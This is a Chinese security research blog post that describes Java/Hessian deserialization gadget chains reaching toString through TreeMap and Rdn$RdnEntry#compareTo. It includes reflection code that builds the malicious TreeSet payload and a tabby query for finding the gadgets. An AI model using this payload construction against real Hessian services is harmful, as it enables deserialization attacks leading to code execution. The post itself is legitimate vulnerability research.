0x01 TreeMap 的 四条触发tosting

核心就是利用javax.naming.ldap.Rdn.RdnEntry#compareTo去触发obj1.equals(obj2)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
        Object xstring = utils.createWithoutConstructor("com.sun.org.apache.xpath.internal.objects.XStringForFSB");
//        Object xstring = createWithoutConstructor("com.sun.org.apache.xpath.internal.objects.XString");
        utils.setFieldValue(xstring, "m_obj", "2");
//       Object xstring = utils.createWithoutConstructor("javax.sound.sampled.AudioFileFormat.Type");
//       Object xstring = utils.createWithoutConstructor("javax.sound.sampled.AudioFormat$Encoding");
        Object rdnEntry1 = utils.createWithoutConstructor("javax.naming.ldap.Rdn$RdnEntry");
        utils.setFieldValue(rdnEntry1, "type", "ysomap");
        utils.setFieldValue(rdnEntry1, "value", objects1);

        Object rdnEntry2 = utils.createWithoutConstructor("javax.naming.ldap.Rdn$RdnEntry");
        utils.setFieldValue(rdnEntry2, "type", "ysomap");
        utils.setFieldValue(rdnEntry2, "value", xstring);
        TreeSet treeSet = makeTreeSet(rdnEntry1, rdnEntry2);

 public static TreeSet makeTreeSet(Object v1, Object v2) throws Exception {
            TreeMap<Object,Object> m = new TreeMap<>();
            utils.setFieldValue(m, "size", 2);
            utils.setFieldValue(m, "modCount", 2);
            Class<?> nodeC = Class.forName("java.util.TreeMap$Entry");
            Constructor nodeCons = nodeC.getDeclaredConstructor(Object.class, Object.class, nodeC);
            nodeCons.setAccessible(true);
            Object node = nodeCons.newInstance(v1, new Object[0], null);
            Object right = nodeCons.newInstance(v2, new Object[0], node);
            utils. setFieldValue(node, "right", right);
            utils.setFieldValue(m, "root", node);

            TreeSet set = new TreeSet();
            utils.setFieldValue(set, "m", m);
            return set;
        }

javax.naming.ldap.Rdn.RdnEntry#compareTo

image-20240706124044436

可以控制vaule,也就是可以控制 obj1.equals(obj2)

使用tabby查询只调用一次的

1
2
MATCH path = (n:Method {NAME: "equals"})-[:CALL]->(:Method {NAME0:"java.lang.Object#toString"}) where none(n in nodes(path) where n.CLASSNAME CONTAINS "com.fr")
RETURN path

image-20240706131137683

排除错误不能的后

image-20240706131217240

分别就是上面的几个类

CLASSNAME: javax.sound.sampled.AudioFormat$Encoding

CLASSNAME: com.sun.org.apache.xpath.internal.objects.XStringForFSB

CLASSNAME: com.sun.org.apache.xpath.internal.objects.XString

CLASSNAME: javax.sound.sampled.AudioFileFormat$Type

哎,只要放以前就是4条cve

https://unam4.github.io/2024/07/06/hessian_tostring/
作者
unam4
发布于
2024年7月6日
许可协议